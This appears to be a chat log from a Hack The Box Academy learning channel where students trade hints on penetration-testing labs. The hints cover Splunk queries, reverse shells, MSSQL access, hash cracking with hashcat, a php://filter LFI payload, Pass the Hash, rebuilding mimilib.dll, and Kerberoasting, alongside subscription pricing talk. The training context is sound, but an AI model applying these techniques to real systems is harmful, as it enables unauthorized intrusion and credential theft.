Using Splunk Applications in CDSA does anyone have any good resources to learn how to complete this section? Not much offered in the material?

catch the ntlmv2 challenge and crack it with your preferred method

i used rockyou

What exactly do you not understand or would like to have additional learning material?

For the two questions:

Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local

Access the Sysmon App for Splunk, go to the "Network Activity" tab, and choose "Network Connections". Fix the search and provide the number of connections that SharpHound.exe has initiated as your answer.

based on the material so far I've tried to deduce what needs to be done and have done my googling and all that but can't seem to figure out what I "should" be doing to accomplish those tasks

I had no issues with the tasks in the material seemed pretty straight forward

I have solved the question not via Reports or Network Activity Tab, but with the Serach Tab.

ok so just forgo the activity?

I probably did not solve the task as intended. 🤷‍♂️

lol thats fair more than one way to do things

Splunk is certainly one of the tools that I need to take a good look at before the exam.

I need some advice on the payloads module

In the live engagement section I compromised all three hosts with metasploit

Ok?

did I do the right thing or should I take another approach

Did you get the flags?

yes

Then unless you wanna manually upload a .war file and dig into how 50064.rb works then you did what's expected

ok thanks

just needed to confirm

there's very few modules, if any, where there's an unintended solution ¯_(ツ)_/¯

yeah what do you think this is, oscp?

[Module: Attacking Commnon Services] [Section: Attacking SQL Databases] have mssqls credentials but cant login? Is this intentionally?

/shrug what error do you specifically get

You're probably missing the -windows-auth flag

I'm pretty new to this scene, I'm working through the Windows Priv Esc module. Often in the examples I will be working in a PS or CMD shell and go through efforts to setup a Reverse Shell through MSFvenom or NetCat. I don't yet understand the advantages of a RevShell over Powershell, can anyone explain this? Thank you in advance

a powershell can also be a reverse shell, reverse shell just means the victim calls back to the attacker and not the other way around

revshell and powershell arent comparable

theyre different concepts entirely

your revshell can BE powershell

if you mean whats the benefit of a meterpter msf-shell, it has a bunch of nice inbuilt functionality that isnt as easy to get with powershell (like running post-exploit modules or upload/download of files)

Good Afternoon can someone give me a nudge on Linux Priv Escalation Skill Assessment the last flag is what im having trouble with

Hint also will be blest

footprinting medium

|| i cannot find the htb user and password anywhere in SSMS, am i suppose to be writing a SQL query or am i just being blind? ||

i wrote a query but it only lists the columns and as being empty

anyone able to give any advice pretty please 🙂

hi everyone, i'm in the AD enumeration & attacks module, in the Privileg Access, can someone help me with this error?

i'm in the last question - Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

Did you try it without "-windows-auth?"

They didnt get an auth error

the connection timed out

Yeah, now i see, i didn't look at it

That IP looks like like an internal IP address, you sure 10.10.14.79 can reach it?

madf0x me next pls

but indeed also mixing a domain login with local auth login is likely to not work once they do resolve the connection issue

okay so im on broken authentication predictable reset token, and im running a modified version of the reset_token_time.py script however it isn't finding anything. can i dm someone?

idr I just clicked around till I got what I needed

In which databases did you try to write the queries?

i just did it on accounts

You're on the right track then, just write good query

OH

i found it

Gj

welp onto hard now

You can do it

i did right click on the most suspicious table > edit first 200 entries

yeah tbh footprinting kinda just brushes over mssql ¯_(ツ)_/¯

It's not until attacking common services that they dive deeper in it

This footprinting hackthebox academy hard lab is tough

Eh

It's not that bad

Have you completed it?

Im stuck a little. Will sleep and look into it tomorrow

Yep

Aren't pwnboxes on private networks? I'm getting 10 requests a second for a smb server I set up. From random user. As in it's trying to log in.

What's the ip?

Be my senpai on this please

If it's a 10.10.x.x it's another htb user

Hard to know how to help when you don't say where you're stuck, if it's the foothold, pay attention to the wording of the engagement and what ports are open

After the foothold it's fairly straightforward from point a-z

I will be precise when Im on my computer

I panicked and closed it all down. It was triyng to bruteforce the user + password

I'm sure the smbserver has a logfile

Ama check it, restarted pwnbox though

oh you're using the browser pwnbox? ¯_(ツ)_/¯

If you're using the in-browser vm (pwnbox) you really don't have anything to worry about

yeye i am

They can't get to your physical machine from the pwnbox

As it's hosted on htb infra

okey okey, got me stressed. Probably gonna set 10 character passwords on my own vm from now on.

I understand I need to use ||php://filter/convert.base64-encode/resource=*|| to get the loaded page
but I can't make it to work ...
any tips??

ok I solve it in a single shot but I think in a less organized way....
someone up 4 consulting ??

I am doing tier 0 - first module - the free ones . I think i am running the vm correctly -
─[us-starting-point-2-dhcp]─[10.10.14.100]─[htb-vikingjohann@htb-kovflyfgim]─[~/my_data]
└──╼ [★]$ sudo login
htb-kovflyfgim login: .... How can i get a hint as how to login and find the flag txt file ?

i used the ssh port as it was open - the walkthrough has the telnet port open

did not finish in two hours - darn

#starting-point is a different thing: read #welcome on how to access more of the server

okay ... um i was attempting a module I thought ... the first and ran out of time before i could login and find the flag

Your copy/paste indicates you're using and connected to the starting point vpn and labs on https://app.hackthebox.com this chat is for the learning modules on https://academy.hackthebox.com for clarity: labs refer to the main site, modules refer to academy

Double quote the query, single quote the powershell command

ok., lemme try it

Can anyone help me with question in:
https://academy.hackthebox.com/module/237/section/2613
Module: Introduction To Digital Forensics
part: "Practical Digital Forensics Scenario"
Q1: Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer
I did try to dump the process memory associated with pid 6744, and ran yara rule against it, but yara result only shows cobaltStrike

didn't work

same

Unrelated question to the modules, but running into issues configuring my VM to use for both labs and academy, I usually use the pwnbox but now want to host my own VM with tools hosted on my machine. But for some reason any machine IP on HTB I cannot ping or run say a nmap scan on, I am connected to openvpn and I am able to access the internet through my VM and download updates and dependencies so not sure what’s wrong with my VM

I feel it might be a setting in my VM, the options are ‘emulate VLAN’ ‘Bridged’ and ‘Host-Only’

is there a discount for students? and if so how much is it. I see that the standard cost is like 490 a year

if you're a student, its $8 per month

Yup, there is special pricing for educational institutions, but your institution will need to enrol with us. Check out https://www.hackthebox.com/universities/contact-us, and speak to your tutors 🙂

Does that give you unlimited access to all modules and labs?

is the sans institute on the list?

it gives you access to academy up to and including tier 2 modules

the main platform, and the pro labs are separate subscriptions, and anything tier 3 or 4 on academy is not included

I'd advise speaking to your tutors. They're best placed to say whether or not your institution is enrolled

sorry, I assumed we were just talking about the student sub on academy, since it's the modules channel

Yeah, me too.. the Academy modules and the Labs are separate, but there is still preferential pricing for educational institutions with regards to Labs. Reach out to your tutors, and ask them to reach out to us if they are interested in enrolling

cool to know, thanks!

looks like the 8 dollar a month is available to me

then seize the opportunity

if I want to get level 3 or higher classes what is the most cost effective way to do that?

platinum subscription

but it's gonna be a long time before you run out of things to do

plus you get cubes from modules you complete

yeah I will sign up

want to get some extra prep work for the GX certs from SANS

just signed up

so on the labs side its 20 a month in addition to the 8 a month on the academy side?

For VIP+ the normal price is $20, so perhaps I was mistaken on the preferential pricing for the Labs as well

If you'd like to reach out to us, raise a help request via https://help.hackthebox.com 🙂

https://help.hackthebox.com/en/articles/5191693-do-you-provide-special-pricing-for-universities-what-are-the-eligibility-criteria-for-it

The discount is applicable for individual students on Academy, but for app.hackthebox.com, it involves more of a relationship with the institution

Hey I got it. It was not as hard as I though. Imap commands can be confusing sometimes...that was it. Thanks anyways for the offer of help big love.

If you're learning, Academy is where you want to be anyway 🙂

Once you've gained confidence and knowledge, the OG HTB platform will give you the opportunity to test your skills against machines, without guided notes

Hey np if you use discord search feature I actually linked a way useful website for imap commands

Like way long ago

There is plenty of free content on app.hackthebox also, but obviously VIP/VIP+ grants a number of benefits

Good luck on your learning journey

thanks

Hi g0blin ^^

Hey 🙂

How're things?

@ocean night What if our institution already has a partnership with HackTheBox and we get free labs on a rolling basis, could we still get a discount for purchasing an individual subscription?

On the mend after almost spiraling

Alright, appreciate the support. Was a freshman to discord. I will use search feature ❤️

I'd advise reaching out to us on the above contact points to discuss this. I'm afraid I'm not the person to provide guidance on this point 🙂 I'm the tech dude

Glad to hear it, you got this

Did you just nosedive, or something triggered? :\

Got fired and struggling to find a job, moving back in with parents soon.tm

Ahhh shit man, I'm sorry to hear that

Fingers crossed you get back up and find somewhere better soon ❤️

Alright, thanks. Im on cpts path. It has been quite rough for a fresh starter on some labs 🙂

Keep on keeping on, study, document, practice and repeat. Not always gonna be easy, but the feeling when you crack a module and solve it.. winning

Im trying, thanks. 🙂 Finished the starting point labs in HackTheBox, doing cpts path in academy. Time is precious

did you do the Information Security Foundations path or you dove straight into CPTS?

Straight into CPTS. Maybe thats why its tough for me on couple of labs

yeah, having a strong foundation is important, CPTS expects you to know everything there already

Alright. Thats a really good suggestion. Although I study information security masters and graduated from computer science, pentesting is something else.

Thanks!

then you probably already do know a lot of it, should be quick to get through

Perfect. Thanks. Appreciated

Anybody can provide some hints for question 3 in Introduction to Splunk and SPL?

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes.

sucks to hear bro. The market is shit right now. I can't find a job to save my life

I can't find the snmp service even though I port scanned it multiple times and tried to grab banner also but snmp doesn't exist at all

https://academy.hackthebox.com/module/112/section/1080

hey

"hashcat -a 0 -m 1000 hash.txt mywordlist.txt",after i enter it says password cracked

Firewall evasion

and i type "hashcat -m 1000 --show --username hash.txt. but at the end there isnot any cracked password

could some clarify for me that?

tried this with john as well,same stuff

Already did that, but I can't even connect to the snmp instance

try hashcat -m 1000 hash.txt --show

what command did you used

snmpwalk -v2c -c public

didnot work,returned hash and blank space

wrong community string

you have to find the community string before you run this command

can you dm me the sc

Oh yea worked

Currently on the ad session, using bloodhound. One query in bloodhound is 'List all Kerberoastable Account' . What makes an account Kerberoastable?

that's easily googleable

and explained in the AD module too

does this literally mean no password needed at all?

Password Attacks-Hard, guys can someone give a hint for Johanna password word from mut_password.list

it's in the list and shouldn't take too long to get, idk what else to tell you

make sure you're using the correct options

I use cme with complete list on smb, before turn on i use tac command to reverse mut_password list so from two terminals and after 3 hours nothing

did you use --local-auth?

nope

as this is not an AD host

there you go

is johanna username case sensitive maybe ? J or j

Windows usernames aren't case sensitive

thank, I will try now with local auth and why HTB make this type of LABs

we are not here to spend hours on tasks, we are here to learn how to do someting for the job

Hey morning guys can someone give me a nudge in windows priv | Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?...... I was able to get a result using the example in the courses notes however for this specific pipe im getting an error "All pipes busy"-"could not be found"

the use of the --local-auth flag is very much explained in the modules

there's nothing wrong with the lab or its difficulty

How can I list all emails in a IMAP server
I already logged in and now want to read the emails in the Important category
a LIST "" *

• LIST (\HasNoChildren \UnMarked) "." Notes
• LIST (\HasNoChildren) "." Meetings
• LIST (\HasNoChildren \UnMarked) "." Important
• LIST (\HasNoChildren) "." INBOX

Doing this room
https://academy.hackthebox.com/module/112/section/1080

check hacktricks

what is the result/output you're getting? Please use the "spoiler tags" in case there is anything you may consider as a spoiler

in windows privesc, section DNSAdmins how can i get that mimilib.dll?

by downloading the latest release from Github

but i should modify kdns.c for adding a system command to be run when the dns will be restarted?

In the course material is mentioned the following: "As detailed in this post: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html"

ik that i should build mimikatz, but didnt find good ressource

but it didnt show how

dusts this off #modules message

ah, yeah, if you have to modify something, you'd have to build it yourself

didnt find a good ressource

don't know if there's anything specific on mimikatz, just follow a generic guide on how to build from source and modify what's necessary

i have vs 2022, but in https://github.com/gentilkiwi/mimikatz#build they mention that i should use 2010 ..., so should i downgrade it?

I can't really help much with the details as I haven't reached that module yet

if you running kali you can type mimikatz in the terminal and it'll take you to usr/share with mimikatz in there

not sure if that works on pwnbox

no, i wanna a custom version of mimilib.dll (a .dll inside the mimikatz project), but thanks

its in there

i should modify some of its files then rebuild it, not the released version

Im doing the command injection module, at the Advanced Command Obfuscation challenge it requires you to get the output of this command : find /usr/share/ | grep root | grep mysql | tail -n 1 . I have managed to run it however I do not get the results of this command, can any1 help me with this?

Hello guys, i'm doing the Password Attacks module, and precisely the Pass the Hash method. A questions is : Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt.
So i've succed to connect with David account using PtH attack, but i can't acces the shared file, "no permission"

it is normal and i have to found an other thing ?

Hello anyone finished the visual htb? I need a little hint I managed to host a simple git repo with: .cs, .csproj, .sln files however It takes too long so basically it gets first some .git/objects/.... and then after a long wait the website says "Not found"

Read and follow #welcome, then ask in #boxes , this is the wrong channel

And don't spoil active boxes

It says expired

The room says expired is it different from retired?

It doesn't give seasonal points anymore, but it's still very much an active box

its only like 3 weeks old

I see okay my bad

On AD module / Kerberoasting from Linux . Trying to install Impacket with 'git clone <github url> ' And Get error "fatal: unable to access 'https://github.com/fortra/impacket.git/': Could not resolve host: github.com
"
from attack host.
What might I be doing wrong?

does the box have internet access

yes

Try removing the final / after Impacket.git

And you're sure the box has internet? What if you ping 8.8.8.8

Impacket should already be present on the Pwnbox btw

does the box not have impacket? trying typing psexec.py

it does

but I guess I have to run it from the attack box?

do you mean the target box?

yes

I have ssh to it

attack box usually means where you are attacking from

i think most (if not all) of impacket gets run from the attack host

Hi guys, am I allowed to post my HTB question here?